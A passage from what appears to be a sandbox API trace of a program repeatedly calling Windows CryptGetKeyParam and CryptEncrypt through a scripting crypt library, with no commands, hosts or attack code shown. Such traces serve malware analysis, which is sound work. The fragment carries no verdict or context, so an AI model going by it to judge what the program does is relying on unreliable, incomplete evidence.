pbData=0x6bb4b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.393] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.393] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.394] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.394] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.394] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.394] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.394] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.394] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.394] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb578, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb578*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.394] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.394] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.394] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.394] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.394] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.394] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.394] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.394] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.394] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.394] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb558*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.394] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.394] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.395] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.395] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.395] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.396] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.396] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.396] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.396] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb438, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb438*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.396] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.396] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.396] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.396] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.396] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.396] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.396] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.396] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.396] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.396] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb498*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.396] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.396] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.396] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.396] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.396] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.397] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.397] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.397] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.397] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb4b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb4b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.397] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.397] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.397] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.397] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.397] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.397] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.397] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.397] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.397] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.397] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb5c8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.406] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.406] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.406] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.406] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.407] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.407] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.407] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.407] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.407] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb558, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb558*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.407] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.407] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.407] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.407] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.407] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.407] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.407] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.407] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.407] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.407] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb488*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.407] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.407] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.407] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.408] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.408] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.408] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.408] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.408] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.408] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb498, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb498*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.408] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.408] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.408] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.408] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.413] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.413] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.413] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.413] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.413] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.413] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb568*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.413] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.413] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.413] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.413] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.413] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.413] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.413] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.413] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.413] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb5c8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb5c8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.414] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.414] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.414] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.414] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.414] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.414] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.414] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.414] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.414] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.414] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb648*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.414] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.414] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.414] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.414] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.414] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.414] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.414] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.414] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.414] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb488, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb488*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.415] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.415] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.415] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.415] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.415] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.415] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.415] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.415] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb3b8*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.415] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.415] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.415] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.415] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.415] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.415] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.415] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.415] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb568, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb568*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.415] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.416] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.416] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.416] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.416] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.416] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.416] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.416] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb538*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.416] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.416] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.416] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.416] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.416] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.417] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.417] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb648, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb648*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.417] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.417] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.417] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.417] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.417] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.417] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.417] CharLowerBuffW (in: lpsz="byte[1]", cchLength=0x7 | out: lpsz="byte[1]") returned 0x7 [0077.417] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.417] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.417] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0, dwBufLen=0x0 | out: pbData=0x6bb578*, pdwDataLen=0x61e2d8*=0x0) returned 1 [0077.417] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0077.417] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0077.417] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.417] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.417] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.417] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.417] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.417] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.418] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb3b8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb3b8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0077.418] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0077.418] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0077.418] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0077.418] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: 